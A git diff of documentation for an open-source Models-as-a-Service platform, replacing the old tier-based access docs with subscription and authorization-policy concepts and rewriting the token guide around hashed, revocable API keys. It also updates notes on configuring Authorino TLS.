(Quota: Is there quota?)"] + end + + Gateway --> A + Gateway --> B + + A -- "Pass" --> BothPass + B -- "Pass" --> BothPass + + BothPass{Access Granted} --> InferenceService["Inference Service"] + + style User fill:#1976d2,stroke:#333,stroke-width:2px,color:#fff + style Gateway fill:#7b1fa2,stroke:#333,stroke-width:2px,color:#fff + style A fill:#e65100,stroke:#333,stroke-width:2px,color:#fff + style B fill:#e65100,stroke:#333,stroke-width:2px,color:#fff + style BothPass fill:#388e3c,stroke:#333,stroke-width:2px,color:#fff + style InferenceService fill:#388e3c,stroke:#333,stroke-width:2px,color:#fff +``` + +## Policies vs. Subscriptions + +| Concern | CRD | Purpose | Subjects/Owners | +|---------|-----|---------|-----------------| +| **Access** | MaaSAuthPolicy | Grants permission to use specific models | `subjects` (groups/users) | +| **Quota** | MaaSSubscription | Defines token rate limits for model usage | `owner` (groups/users) | +| **Model** | MaaSModelRef | Identifies models on the cluster; provides endpoint and status | — | + + +## Why Separate Policies and Subscriptions? + +This separation lets you create **generic subscriptions** that span many models while still limiting access to specific models per team. + +**Example:** You have a Premium subscription that spans 20 models. You want to give the `data-science-team` access to 5 of those models at the Premium subscription level. + +**How to do it:** + +1. Make `data-science-team` the **owner** of the Premium subscription (they get quota for all 20 models). +2. Create a **policy** that grants `data-science-team` access to only those 5 models. + +The team can use only the 5 models specified in the policy. Their usage is governed by the subscription's rate limits. + +**Benefits:** + +- **Add or remove access per team** — Update the policy to grant or revoke access to models for that team; no changes to the subscription required. 
+- **Reuse one subscription across teams** — Another team (e.g., `ml-engineering`) can be an owner of the same Premium subscription but have a policy that grants access to a different subset of models (e.g., 8 of the 20). Each team gets the same quota tier but only sees the models you allow. + +## Related Documentation + +For configuration details, see: + +- [Quota and Access Configuration](quota-and-access-configuration.md) — Step-by-step configuration for MaaSModelRef, MaaSAuthPolicy, and MaaSSubscription + +Additional references: + +- [Subscription Architecture](https://github.com/opendatahub-io/models-as-a-service/blob/main/archdiagrams/SubscriptionArch.md) — Design document for the subscription model +- [MaaS Controller old-vs-new flow](https://github.com/opendatahub-io/models-as-a-service/blob/main/maas-controller/docs/old-vs-new-flow.md) — Comparison of subscription-based flows diff --git a/docs/content/configuration-and-management/tier-concepts.md b/docs/content/configuration-and-management/tier-concepts.md deleted file mode 100644 index 68c6205f2..000000000 --- a/docs/content/configuration-and-management/tier-concepts.md +++ /dev/null @@ -1,80 +0,0 @@ -# Tier Concepts - -This section provides reference information about how the tier system works. 
- -## Tier Membership Mapping - -MaaS and Kubernetes administrators can defined the subscription levels using the `tier-to-group-mapping` ConfigMap in the `maas-api` namespace: - -**tier-to-group-mapping.yaml ConfigMap example:** - -```yaml -apiVersion: v1 -kind: ConfigMap -metadata: - name: tier-to-group-mapping - namespace: maas-api -data: - tiers: | - - name: free - description: Free tier for basic users - level: 1 - groups: - - system:authenticated - - name: premium - description: Premium tier - level: 10 - groups: - - premium-users - - name: enterprise - description: Enterprise tier - level: 20 - groups: - - enterprise-users -``` - -## ConfigMap Field Breakdown - -| Field | Purpose | Default Value | -|-------|---------|----------| -| **name** | The tier identifier used throughout the system. Must be unique and matches tier names in rate limit policies. | `free`, `premium`, `enterprise` | -| **description** | Human-readable description of the tier's purpose and who it's intended for. Used for documentation and UI display. | `Free tier for basic users`, `Enterprise tier for high-volume customers` | -| **level** | Numeric hierarchy for tier precedence. Higher numbers indicate higher tiers.
When a user belongs to multiple groups, the highest level tier is selected. | `1` (lowest), `10` (medium), `20` (highest) | -| **groups** | Kubernetes groups whose members are assigned to this tier.
Users must be members of at least one group in the list to get this tier. | `system:authenticated`, `premium-users`, `enterprise-users` | - -**Important Notes:** - -- Users with **multiple group memberships** are assigned to the tier with the **highest level number** -- The `system:authenticated` group includes all authenticated users, commonly used for the free tier -- Group names must exist in your Kubernetes identity provider (LDAP, OIDC, etc.) -- Tier `name` values are case-sensitive and must match exactly with rate limit policy predicates - -## Tier Rate Limits Configuration - -MaaS and Kubernetes administrators can configure rate limits for each tier using the `RateLimitPolicy` custom resource. - -**RateLimitPolicy.yaml example:** - -```yaml -apiVersion: kuadrant.io/v1beta2 -kind: RateLimitPolicy -metadata: - name: model-rate-limits - namespace: llm -``` - -## Tier Namespaces - -Each tier gets a dedicated namespace following the pattern `-tier-`: - -- `maas-default-gateway-tier-free` -- `maas-default-gateway-tier-premium` -- `maas-default-gateway-tier-enterprise` - -## Tier Resolution Process - -1. User authenticates with JWT token -2. Gateway extracts user groups from token -3. MaaS API resolves tier based on group membership -4. Tier information is cached for 5 minutes -5. Access control and rate limiting are applied based on tier diff --git a/docs/content/configuration-and-management/tier-configuration.md b/docs/content/configuration-and-management/tier-configuration.md deleted file mode 100644 index bcd15385e..000000000 --- a/docs/content/configuration-and-management/tier-configuration.md +++ /dev/null @@ -1,263 +0,0 @@ -# Tier Configuration - -This guide provides step-by-step instructions for configuring and managing tiers in the MaaS Platform. - -## Configuration Steps - -### 1. Configure Tier Mapping - -Update `tier-to-group-mapping` ConfigMap: - -To add a new tier, save the current ConfigMap, modify it, and reapply: - -```bash -# 1. 
Edit ConfigMap (use example below as a guide) -kubectl edit configmap tier-to-group-mapping -n maas-api - -# Example: Add this tier entry to the end of the tiers list: -# - name: stier -# description: S tier user -# level: 99 -# groups: -# - fox -``` - -Verify the updated ConfigMap: - -```bash -kubectl apply -f - < -n llm \ - alpha.maas.opendatahub.io/tiers='["stier","premium","enterprise"]' \ - --overwrite -``` - -**Annotation Behavior:** - -- **List of tier names**: Grant access to specific tiers (e.g., `["stier","premium","enterprise"]`) -- **Empty list `[]`**: Grant access to **all** tiers -- **Missing annotation**: **No** tiers have access by default - -**Example - Grant access to stier and premium tiers:** - -```bash -kubectl annotate llminferenceservice qwen3 -n llm \ - alpha.maas.opendatahub.io/tiers='["stier","premium"]' \ - --overwrite -``` - -This annotation automatically sets up the necessary RBAC (Role and RoleBinding) for the specified tiers to access the model via MaaS tokens. - -!!!Note "Manual RBAC Setup" - For reference, here's what the automatic RBAC setup looks like behind the scenes if you need to configure access manually: - - ```yaml - --- - apiVersion: rbac.authorization.k8s.io/v1 - kind: Role - metadata: - name: model-post-access - namespace: - rules: - - apiGroups: ["serving.kserve.io"] - resources: ["llminferenceservices"] - verbs: ["post"] - --- - apiVersion: rbac.authorization.k8s.io/v1 - kind: RoleBinding - metadata: - name: model-post-access-tier-binding - namespace: - subjects: - - kind: Group - name: system:serviceaccounts:maas-default-gateway-tier- - apiGroup: rbac.authorization.k8s.io - roleRef: - kind: Role - name: model-post-access - apiGroup: rbac.authorization.k8s.io - ``` - -!!!info "Why the custom `post` verb?" - We intentionally use a custom verb (`post`) instead of standard Kubernetes verbs like `get` or `create`. This is the **only** RBAC permission required for model access. 
By using a non-standard verb that doesn't exist in Kubernetes' built-in authorization, we minimize the security surface - these service accounts cannot accidentally read, modify, or delete any cluster resources. - -### 3. Configure Rate Limiting - -Add tier-specific rate limits by patching the TokenRateLimitPolicy targeting the gateway: - -```bash -kubectl patch tokenratelimitpolicy -n openshift-ingress --type merge --patch-file=/dev/stdin <<'EOF' -spec: - limits: - stier-user-tokens: # 1 - rates: - - limit: 999 # 2 - window: 1m # 3 - when: - - predicate: auth.identity.tier == "stier" # 4 - counters: - - expression: auth.identity.userid # 5 -EOF -``` - -**Rate Limit Policy Configuration Explained:** - -1. **Tier definition** - Each tier (free, premium, enterprise) gets its own configuration block (this is just a naming convention, it is not used for the actual tier resolution) -2. **Token limit** - Maximum number of total tokens allowed per time window -3. **Time window** - Duration after which the request counter resets -4. **Predicate condition** - Determines when this tier's limits apply based on user authentication -5. **Counter expression** - Tracks token consumption per user ID (globally) - -!!!Warning "Important" - The predicate condition (not the Tier Definition) is used to determine when this tier's limits apply based on user authentication. It is a CEL expression that is evaluated by the Authorino policy engine. - -Validate the TokenRateLimitPolicy has been updated and enforced: - -```bash -# Delete the Kuadrant operator pod to trigger a re-sync -kubectl delete pod -l control-plane=controller-manager -n kuadrant-system - -# Wait for the TokenRateLimitPolicy to be enforced -kubectl wait --for=condition=Enforced=true tokenratelimitpolicy/ -n openshift-ingress --timeout=2m -``` - -### 4. 
Validate the Configuration - -Configuration can be validated by logging in as a user belonging to the appropriate group and running through the manual validation steps in the [deployment scripts documentation](../install/validation.md), or by using the automated validation script. - -```bash -# Validate the configuration with 20 requests and a max tokens limit of 500 -./scripts/validate-deployment.sh --rate-limit-requests 20 --max-tokens 500 -``` - -**Example Output:** - -```bash -🔍 Checking: Token information -ℹ️ Token subject: system:serviceaccount:maas-default-gateway-tier-stier:jland-78028f6d -✅ PASS: User tier: stier <--- Important -🔍 Checking: Models endpoint -✅ PASS: Models endpoint returns 200 OK -... -🔍 Checking: Rate limiting -ℹ️ Sending 20 rapid requests to test rate limiting... -✅ PASS: Rate limiting is working (5 successful, 15 rate limited) <--- Important -``` - -## Troubleshooting - -### General Tips - -**Authentication errors (403/401):** -Check Authorino logs for detailed error messages: - -```bash -kubectl logs -n openshift-ingress -l app.kubernetes.io/name=authorino --tail=50 -``` - -**Token retrieval issues:** -Check MaaS API logs during the token request: - -```bash -kubectl logs -n maas-api -l app=maas-api --tail=50 -``` - -**Policy enforcement issues:** -Restart the Kuadrant operator to trigger policy re-sync: - -```bash -kubectl delete pod -l control-plane=controller-manager -n kuadrant-system -``` - -### Common Issues - -#### 403 Forbidden: "not authorized: unknown reason" - -**Possible Cause:** Added new tier to ConfigMap but didn't update the TokenRateLimitPolicy. 
- -**Fix:** Validate/Update the TokenRateLimitPolicy as documented in [Configure Rate Limiting](#3-configure-rate-limiting), then restart the Kuadrant operator: - -```bash -kubectl patch tokenratelimitpolicy -n openshift-ingress --type merge --patch-file=/dev/stdin <<'EOF' -spec: - limits: - -user-tokens: - rates: - - limit: 999 - window: 1m - when: - - predicate: auth.identity.tier == "" - counters: - - expression: auth.identity.userid -EOF - -kubectl delete pod -l control-plane=controller-manager -n kuadrant-system -``` - -!!!Warning "Modifying Tiers During Active Usage" - Modifying the tier definitions (ConfigMap) while users have active requests may cause side effects due to caching and eventual consistency. See [Tier Modification Known Issues](./tier-modification-known-issues.md) for details on: - - - Propagation delays for group changes - - Tier name immutability - - Monitoring inconsistencies - - Service interruptions on tier deletion - -!!!Warning "Removing Group Membership During Active Usage" - Removing a user from a group while they have active tokens may not immediately revoke access. See [Group Membership Known Issues](./group-membership-known-issues.md) for details on: - - - Existing tokens remaining valid until expiration - - Rate limiting continuing at the old tier - - Service Account persistence after group removal - - Recommended practices for group membership changes - -!!!info "Model Tier Access Changes" - Removing a model from a tier's access list (by updating the `alpha.maas.opendatahub.io/tiers` annotation) takes effect immediately. 
See [Model Tier Access Behavior](./model-access-behavior.md#model-tier-access-changes-during-active-usage) for details on: - - - Expected behaviors when access is revoked - - RBAC propagation timing - - Recommended practices for tier access changes diff --git a/docs/content/configuration-and-management/tier-modification-known-issues.md b/docs/content/configuration-and-management/tier-modification-known-issues.md deleted file mode 100644 index 724321618..000000000 --- a/docs/content/configuration-and-management/tier-modification-known-issues.md +++ /dev/null @@ -1,115 +0,0 @@ -# Tier Modification Known Issues - -This document describes known issues and side effects related to modifying tier definitions (ConfigMap) during active usage in the MaaS Platform Technical Preview release. - -## Tier Configuration Changes During Active Usage - -### Issue Description - -When the `tier-to-group-mapping` ConfigMap is modified (e.g., changing groups or levels) while users are actively making requests, several side effects may occur due to caching and eventual consistency in the system. - -### How Tier Resolution Works - -1. **ConfigMap**: Tiers are defined in the `tier-to-group-mapping` ConfigMap. -2. **MaaS API**: Watches the ConfigMap and updates its internal state. Used for token generation. -3. **AuthPolicy (Authorino)**: Caches tier lookup results for authenticated users (default TTL: 5 minutes). -4. **Token**: Contains a Service Account identity associated with a specific tier namespace (e.g., `maas-default-gateway-tier-free`) at the time of issuance. - -### Side Effects - -#### 1. Propagation Delay for Group Changes - -**Impact**: Medium - -**Description**: - -If a user's group membership changes or a tier's group definition is updated: - -- The `AuthPolicy` (Authorino) caches the user's tier for 5 minutes. -- The user will continue to be rate-limited according to their *old* tier until the cache expires. -- After the cache expires, the new tier limits will apply. 
- -**Example Scenario**: - -```text -T+0s: User added to "premium-users" group (was "free") -T+10s: ConfigMap updated in MaaS API -T+1m: User makes request -> Authorino uses cached "free" tier (Rate Limit: 10/min) -T+5m: Cache expires -T+6m: User makes request -> Authorino looks up tier -> "premium" (Rate Limit: 1000/min) -``` - -**Workaround**: - -- Wait for the cache TTL (5 minutes) for changes to fully propagate. -- Restart the Authorino pods to force immediate cache invalidation (disruptive). - -#### 2. Tier Names Are Immutable - -**Important**: Tier names (the `name` field in the ConfigMap) are expected to be **immutable** and should not be renamed after creation. This design ensures consistency across: - -- `RateLimitPolicy` and `TokenRateLimitPolicy` definitions -- Tier namespace naming (e.g., `maas-default-gateway-tier-free`) -- Token claims and Service Account associations - -**If you need to change how a tier is displayed to users**, use the `displayName` field instead. The `displayName` can be modified at any time without affecting the underlying tier configuration or policies. - -**Example**: - -```yaml -# Correct: Change displayName, not name -tiers: - - name: free # Immutable - do not change - displayName: "Starter Plan" # Can be changed for UI purposes - level: 1 - groups: - - "system:authenticated" -``` - -#### 3. Monitoring Inconsistency - -**Impact**: Low - -**Description**: - -Tokens are issued with a Service Account in a tier-specific namespace (e.g., `maas-default-gateway-tier-free`). This namespace is embedded in the token claims. -If a user moves to a new tier (e.g., `premium`) but continues using a valid token issued under the old tier: - -- **Enforcement**: They get the *new* tier's rate limits (after cache expiry). -- **Monitoring**: Their usage metrics in Prometheus will still be attributed to the *old* Service Account/Namespace (`maas-default-gateway-tier-free`). - -**Example**: - -- User upgrades to Premium. 
-- Token claim: `system:serviceaccount:maas-default-gateway-tier-free:user-123` -- Rate Limit enforced: Premium (correct) -- Prometheus Metric: `requests_total{namespace="maas-default-gateway-tier-free"}` (incorrect attribution) - -**Workaround**: - -- Users must request a new token to have their usage correctly attributed to the new tier's namespace. -- This is a monitoring reporting issue only; access control is unaffected. -- **Token Invalidation**: Tokens can be invalidated by removing the old ServiceAccount associated with them. When a user moves to a new tier, their old ServiceAccount in the previous tier namespace remains (it is not automatically deleted). Administrators can manually delete these orphaned ServiceAccounts to invalidate any remaining tokens, but this is not required for normal operation. - -#### 4. Service Interruption on Tier Deletion - -**Impact**: Medium - -**Description**: - -If a tier is deleted from the ConfigMap while users are still assigned to it (and have no other matching tier): - -- The `TierLookup` endpoint will return an error (e.g., 404 or GroupNotFound). -- The `AuthPolicy` relies on this metadata. -- Requests may fail with `403 Forbidden` or `500 Internal Server Error` depending on how the failure is handled in the policy. - -**Workaround**: - -- Ensure users are moved to a new tier (via group changes) *before* deleting the old tier definition. - -### Recommended Practices - -1. **Treat Tier Names as Immutable**: Do not rename tiers after creation. Use `displayName` for UI-facing name changes. -2. **Update Policies First**: When adding new tiers, update the `RateLimitPolicy` first. -3. **Plan for Delays**: Expect a 5-minute delay for tier changes to affect active traffic. -4. **Token Refresh**: Encourage users to refresh their tokens after significant tier changes to ensure correct monitoring attribution. 
diff --git a/docs/content/configuration-and-management/tier-overview.md b/docs/content/configuration-and-management/tier-overview.md deleted file mode 100644 index 2b71a8f99..000000000 --- a/docs/content/configuration-and-management/tier-overview.md +++ /dev/null @@ -1,27 +0,0 @@ -# Tier Management Overview - -This guide explains how to configure and manage subscription tiers for the MaaS Platform. Tiers enable differentiated service levels with varying access permissions, rate limits, and quotas. - -## Overview - -The tier system is driven by Kubernetes native objects and provides: - -- **Group-based access control**: Users are assigned tiers based on their Kubernetes group membership -- **Namespace-scoped RBAC**: Each tier has its own namespace for permission management -- **Dynamic tier resolution**: User tiers are resolved on each request -- **Per-model authorization**: Access control is enforced at the model level -- **Hierarchical precedence**: Users with multiple group memberships get the highest tier - -## Documentation Structure - -This tier management documentation is organized into three sections: - -1. **[Tier Overview](tier-overview.md)** (this document) - High-level overview of the tier system -2. **[Tier Configuration](tier-configuration.md)** - Step-by-step configuration guide -3. **[Tier Concepts](tier-concepts.md)** - Reference material explaining how the tier system works - -## Quick Start - -To get started with tier management, see the [Configuration Guide](tier-configuration.md). - -For detailed information about how the tier system works internally, see the [Tier Concepts](tier-concepts.md) documentation. 
diff --git a/docs/content/configuration-and-management/tls-configuration.md b/docs/content/configuration-and-management/tls-configuration.md index 729795e3a..5978e3f3a 100644 --- a/docs/content/configuration-and-management/tls-configuration.md +++ b/docs/content/configuration-and-management/tls-configuration.md @@ -46,12 +46,24 @@ Authorino handles two TLS-protected traffic flows: For ODH/RHOAI deployments, the inbound flow is a [platform pre-requisite](https://github.com/opendatahub-io/kserve/tree/release-v0.15/docs/samples/llmisvc/ocp-setup-for-GA#ssl-authorino) for secure `LLMInferenceService` communication; only the outbound configuration is needed for MaaS. -For all deployments using `./scripts/deploy.sh` (both operator and kustomize modes with TLS enabled), both flows are configured automatically via `configure-authorino-tls.sh`. +For all deployments using `./scripts/deploy.sh` (both operator and kustomize modes with TLS enabled), both flows are configured automatically via `scripts/setup-authorino-tls.sh`. + +!!! warning "Authorino TLS script modifies operator-managed resources" + The `scripts/setup-authorino-tls.sh` script patches Authorino's service and deployment directly. When run (automatically by `deploy.sh` or manually), it will annotate the Authorino service, patch the Authorino CR, and add environment variables to the Authorino deployment. Use `--disable-tls-backend` with `deploy.sh` to skip this if you manage Authorino TLS separately. #### Gateway → Authorino (Listener TLS) Enables TLS on Authorino's gRPC listener for incoming authentication requests from the Gateway. 
+**Quick setup:** Run the standalone script (or let `deploy.sh` run it automatically): + +```bash +./scripts/setup-authorino-tls.sh +# Use AUTHORINO_NAMESPACE=rh-connectivity-link for RHCL +``` + +**Manual configuration:** + ```bash # Annotate service for certificate generation kubectl annotate service authorino-authorino-authorization \ @@ -106,7 +118,7 @@ spec: #### Authorino → maas-api (Outbound TLS) -Enables Authorino to make HTTPS calls to `maas-api` for tier metadata lookups. Requires the cluster CA bundle and SSL environment variables. +Enables Authorino to make HTTPS calls to `maas-api` for metadata lookups (e.g., API key validation). Requires the cluster CA bundle and SSL environment variables. ```bash # Configure SSL environment variables for outbound HTTPS diff --git a/docs/content/configuration-and-management/token-management.md b/docs/content/configuration-and-management/token-management.md index fefa62abe..bf302ef90 100644 --- a/docs/content/configuration-and-management/token-management.md +++ b/docs/content/configuration-and-management/token-management.md @@ -1,21 +1,24 @@ # Understanding Token Management -This guide explains the token-based authentication system used to access models in the tier-based access control system. -It covers how token issuance works, the underlying service account architecture, and token lifecycle management. +This guide explains the authentication and credential management used to access models in the MaaS Platform. -!!! note - **Prerequisites**: This document assumes you have already configured tiers, RBAC, and rate limits. - See [Configuring Subscription Tiers](tier-configuration.md) for setup instructions. +!!! tip "API keys (current)" + The platform uses **API keys** (`sk-oai-*`) stored in PostgreSQL for programmatic access. Create keys via `POST /v1/api-keys` (authenticate with your OpenShift token) and use them with the `Authorization: Bearer` header. 
Each key is bound to one MaaSSubscription at creation time (optional `subscription` in the request body; if omitted, the **highest `spec.priority`** subscription you can access is chosen). See [Quota and Access Configuration](quota-and-access-configuration.md) and [Subscription Known Issues](subscription-known-issues.md). + +!!! note "Prerequisites" + This document assumes you have configured subscriptions (MaaSAuthPolicy, MaaSSubscription). + See [Quota and Access Configuration](quota-and-access-configuration.md) for setup. --- ## Table of Contents 1. [Overview](#overview) -1. [How Token Issuance Works](#how-token-issuance-works) +1. [How API Key Creation Works](#how-api-key-creation-works) +1. [How API Key Validation Works](#how-api-key-validation-works) 1. [Model Discovery](#model-discovery) 1. [Practical Usage](#practical-usage) -1. [Token Lifecycle Management](#token-lifecycle-management) +1. [API Key Lifecycle Management](#api-key-lifecycle-management) 1. [Frequently Asked Questions (FAQ)](#frequently-asked-questions-faq) 1. [Related Documentation](#related-documentation) @@ -23,77 +26,104 @@ It covers how token issuance works, the underlying service account architecture, ## Overview -The platform uses a secure, token-based authentication system. Instead of using your primary OpenShift credentials to -access models directly, you first exchange them for a temporary, specialized access token. This approach provides several key benefits: +The platform uses a secure, API key–based authentication system. You authenticate with your OpenShift credentials to create long-lived API keys, which are stored as SHA-256 hashes in a PostgreSQL database. This approach provides several key benefits: -- **Enhanced Security**: Tokens are short-lived, reducing the risk of compromised credentials. They are also narrowly scoped for model access only. 
-- **Tier-Based Access Control**: The token you receive is automatically associated with your subscription tier (e.g., free, premium), ensuring you get the correct permissions and rate limits. -- **Auditability**: Every request made with a token is tied to a specific identity and can be audited. -- **Kubernetes-Native Integration**: The system leverages standard, Kubernetes authentication and authorization mechanisms. +- **Long-Lived Credentials**: API keys remain valid until you revoke them or they expire (configurable), unlike short-lived Kubernetes tokens. +- **Subscription-Based Access Control**: Keys inherit your group membership at creation time; the gateway uses these groups for subscription lookup and rate limits. +- **Auditability**: Every request is tied to a specific key and identity; `last_used_at` tracks usage. +- **Show-Once Security**: The plaintext key is returned only at creation; only the hash is stored. The process is simple: ```text -You authenticate with OpenShift → Request a token from the API → Use that token to call models +Authenticate with OpenShift → Create an API key via POST /v1/api-keys → Use the key with Authorization: Bearer for model access ``` --- -## How Token Issuance Works +## How API Key Creation Works -When you request a token, you are essentially trading your long-term OpenShift identity for a short-term, -purpose-built identity in the form of a Kubernetes Service Account. +When you create an API key, you trade your OpenShift identity for a long-lived credential that can be used for programmatic access. ### Key Concepts -- **Tier Namespace**: The platform maintains a separate Kubernetes namespace for each subscription tier (e.g., `...-tier-free`, `...-tier-premium`). These namespaces isolate users based on their access level. -- **Service Account (SA)**: When you request a token for the first time, the system creates a Service Account that represents you inside your designated tier namespace. 
This SA inherits all the permissions assigned to that tier. -- **Access Token**: The token you receive is a standard JSON Web Token (JWT) that authenticates you as that specific Service Account. When you present this token to the gateway, the system knows your identity, your tier, and what permissions you have. -- **Token Audience**: The intended recipient of your token. This is validated during authentication and must match the gateway's configuration. -- **Token Expiration**: The time after which the token expires. Tokens are short-lived to reduce the risk of compromised credentials. +- **Subscription binding**: Each key stores a MaaSSubscription name resolved at mint time. You can set it explicitly with the optional JSON field `subscription` on `POST /v1/api-keys`. If you omit it, the API selects your **highest-priority** accessible subscription (ties break deterministically—see operator notes below). +- **Subscription access**: Your access is still determined by MaaSAuthPolicy and MaaSSubscription, which map groups to models and rate limits. The bound name is used for gateway subscription resolution and metering. +- **User Groups**: At creation time, your current group membership is stored with the key. These groups are used for subscription-based authorization when the key is validated. +- **API Key**: A cryptographically secure string with `sk-oai-*` prefix. The plaintext is shown once; only the SHA-256 hash is stored in PostgreSQL. +- **Expiration**: Keys have a configurable TTL via `expiresIn` (e.g., `30d`, `90d`, `1h`). If omitted, the key defaults to the configured maximum (e.g., 90 days). + +The create response includes a `subscription` field echoing the bound subscription name. -### Token Issuance Flow +### API Key Creation Flow -This diagram illustrates the process of obtaining a token. +This diagram illustrates the process of creating an API key. 
```mermaid sequenceDiagram participant User as OpenShift User + participant Gateway + participant AuthPolicy as AuthPolicy (Authorino) participant MaaS as maas-api - participant K8s as Kubernetes API - participant TierNS as Tier Namespace
(e.g., *-tier-premium) + participant DB as PostgreSQL + + Note over User,MaaS: API Key Creation + User->>Gateway: 1. POST /v1/api-keys (Bearer OpenShift token) + Gateway->>AuthPolicy: Route request + AuthPolicy->>AuthPolicy: Validate OpenShift token (TokenReview) + AuthPolicy->>MaaS: 2. Forward request + user context (username, groups) + MaaS->>MaaS: Generate sk-oai-* key, hash with SHA-256 + MaaS->>MaaS: Resolve subscription (explicit or highest priority) + MaaS->>DB: 3. Store hash + metadata (username, groups, subscription, name, expiresAt) + DB-->>MaaS: Stored + MaaS-->>User: 4. Return plaintext key ONCE (never stored) + + Note over User,DB: Key is ready for model access +``` + +--- + +## How API Key Validation Works + +When you use an API key for inference, the gateway validates it via the MaaS API before allowing the request. + +### Validation Flow + +```mermaid +sequenceDiagram + participant User as Client participant Gateway + participant AuthPolicy as MaaSAuthPolicy (Authorino) + participant MaaS as maas-api + participant DB as PostgreSQL participant Model as Model Backend - Note over User,MaaS: Token Issuance - User->>MaaS: 1. Authenticate with OpenShift token - MaaS->>K8s: Validate token (TokenReview) - K8s-->>MaaS: username, groups - Note right of MaaS: Determine tier from
tier-to-group-mapping - MaaS->>K8s: Ensure tier namespace exists - K8s->>TierNS: Create if needed - MaaS->>TierNS: Create/get Service Account for user - TierNS-->>MaaS: SA ready - MaaS->>K8s: Request SA token (TokenRequest) - K8s-->>MaaS: Issued token - MaaS-->>User: Return issued token - - Note over User,Model: Model Access - User->>Gateway: 3. Request with issued token - Gateway->>K8s: Validate token (TokenReview) - Note right of K8s: Token from SA in
tier namespace - K8s-->>Gateway: Valid, with groups - Note right of Gateway: Tier lookup,
SAR check,
Rate limits - Gateway->>Model: 4. Authorized request + Note over User,MaaS: Inference Request + User->>Gateway: 1. Request with Authorization: Bearer sk-oai-* + Gateway->>AuthPolicy: Route to MaaSAuthPolicy + AuthPolicy->>MaaS: 2. POST /internal/v1/api-keys/validate (key) + MaaS->>MaaS: Hash key, lookup by hash + MaaS->>DB: 3. SELECT by key_hash + DB-->>MaaS: username, groups, subscription, status + MaaS->>MaaS: Check status (active/revoked/expired) + MaaS-->>AuthPolicy: 4. valid: true, userId, groups, subscription + AuthPolicy->>AuthPolicy: Subscription check, inject headers, rate limits + AuthPolicy->>Model: 5. Authorized request (identity headers) Model-->>Gateway: Response Gateway-->>User: Response ``` +The validation endpoint (`/internal/v1/api-keys/validate`) is called by Authorino on every request that bears an `sk-oai-*` token. It: + +1. Hashes the incoming key and looks it up in the database +2. Returns `valid: true` with `userId`, `groups`, and `subscription` if the key is active and not expired +3. Returns `valid: false` with a reason if the key is invalid, revoked, or expired + --- ## Model Discovery -The `/v1/models` endpoint allows you to discover which models you're authorized to access. This endpoint works with any valid authentication token — you don't need to create an API key first. +The `/v1/models` endpoint allows you to discover which models you're authorized to access. This endpoint works with any valid authentication token — you can use your OpenShift token or an API key. ### How It Works @@ -108,119 +138,125 @@ flowchart LR This means you can: -1. **Authenticate with OpenShift or OIDC** — use your existing identity and the same token you would use for inference. -2. **Call `/v1/models` immediately** — see only the models you can access, without creating an API key first. +1. **Authenticate with OpenShift or OIDC** — use your existing identity token for `GET /v1/models` (optional `X-MaaS-Subscription` when you have multiple subscriptions). 
+2. **Use an API key** — use your `sk-oai-*` key in the Authorization header for listing and for inference. +3. **Call `/v1/models` immediately** — see only the models you can access, without creating an API key first (if using an OpenShift token). -!!! info "Future: Token minting" - Once MaaS API token minting is in place, the implementation may be revisited (e.g. minting a short-lived token for gateway auth when the client's token has a different audience). For now, the Authorization header is always passed through as-is. +!!! note "Inference vs listing" + Inference (calls to each model’s chat/completions URL) requires an API key in `Authorization: Bearer` only. Do not send `X-MaaS-Subscription` on inference—the subscription is the one bound at API key mint time. `GET /v1/models` accepts either an API key or an OpenShift token; with a user token, `X-MaaS-Subscription` remains supported for filtering. --- ## Practical Usage -For step-by-step instructions on obtaining and using tokens to access models, including practical examples and troubleshooting, see the [Self-Service Model Access Guide](../user-guide/self-service-model-access.md). +For step-by-step instructions on obtaining and using API keys to access models, including practical examples and troubleshooting, see the [Self-Service Model Access Guide](../user-guide/self-service-model-access.md). That guide provides: - Complete walkthrough for getting your OpenShift token -- How to request an access token from the API -- Examples of making inference requests with your token +- How to create an API key via `POST /v1/api-keys` +- Examples of making inference requests with your API key - Troubleshooting common authentication issues --- -## Token Lifecycle Management +## API Key Lifecycle Management -Access tokens are ephemeral and must be managed accordingly. +API keys are long-lived by default but support expiration and revocation. 
-### Token Expiration +### Key Expiration -Tokens have a finite lifetime for security purposes: +Keys have a configurable TTL: -- **Default lifetime**: 4 hours (configurable when requesting) -- **Maximum lifetime**: Determined by your Kubernetes cluster configuration +- **Default**: Omit `expiresIn` in the create request; the key uses the configured maximum (e.g., 90 days). +- **Custom TTL**: Set `expiresIn` when creating (e.g., `"90d"`, `"30d"`, `"1h"`). The response includes `expiresAt` (RFC3339). -When a token expires, any API request using it will fail with an `HTTP 401 Unauthorized error`. -To continue, you must request a new token using the process described above. +When a key expires, validation returns `valid: false` with reason `"key revoked or expired"`. Create a new key to continue. -**Tips:** +### Key Revocation -- For interactive use, request tokens with a lifetime that covers your session (e.g., 4h). -- For automated scripts or applications, implement logic to refresh the token proactively before it expires. +**Revoke a single key:** Send a `DELETE` request to `/v1/api-keys/:id`. -### Token Revocation - -You can invalidate all active tokens associated with your user account. This is a key security feature if you believe a token has been exposed. +```bash +curl -sSk -X DELETE "${MAAS_API_URL}/maas-api/v1/api-keys/${KEY_ID}" \ + -H "Authorization: Bearer $(oc whoami -t)" +``` -To revoke all your tokens, send a `DELETE` request to the `/v1/tokens` endpoint. +**Bulk revoke all keys for a user:** Send a `POST` request to `/v1/api-keys/bulk-revoke`. 
- -```shell -curl -sSk -X DELETE "${MAAS_API_URL}/v1/tokens" \ - -H "Authorization: Bearer $(oc whoami -t)" +```bash +curl -sSk -X POST "${MAAS_API_URL}/maas-api/v1/api-keys/bulk-revoke" \ + -H "Authorization: Bearer $(oc whoami -t)" \ + -H "Content-Type: application/json" \ + -d '{"username": "alice"}' ``` -This action immediately deletes your underlying Service Account, which invalidates all tokens that have ever been issued for it. -The Service Account will be automatically recreated the next time you request a token. + +Revocation updates the key status to `revoked` in the database. The next validation request will reject the key. Authorino may cache validation results briefly; revocation is effective as soon as the cache expires. !!! warning "Important" - **For Platform Administrators**: Admins can manually revoke a user's tokens by finding and deleting their Service Account - in the appropriate tier namespace (e.g., `-tier-premium`). This is an effective way to immediately cut - off access for a specific user in response to a security event. + **For Platform Administrators**: Admins can revoke any user's keys via `DELETE /v1/api-keys/:id` (if they own or have admin access) or `POST /v1/api-keys/bulk-revoke` with the target username. This is an effective way to immediately cut off access for a specific user in response to a security event. --- ## Frequently Asked Questions (FAQ) -**Q: My tier is wrong or shows as "free". How do I fix it?** +**Q: My subscription access is wrong. How do I fix it?** + +A: Your access is determined by your group membership in OpenShift at the time the API key was created. 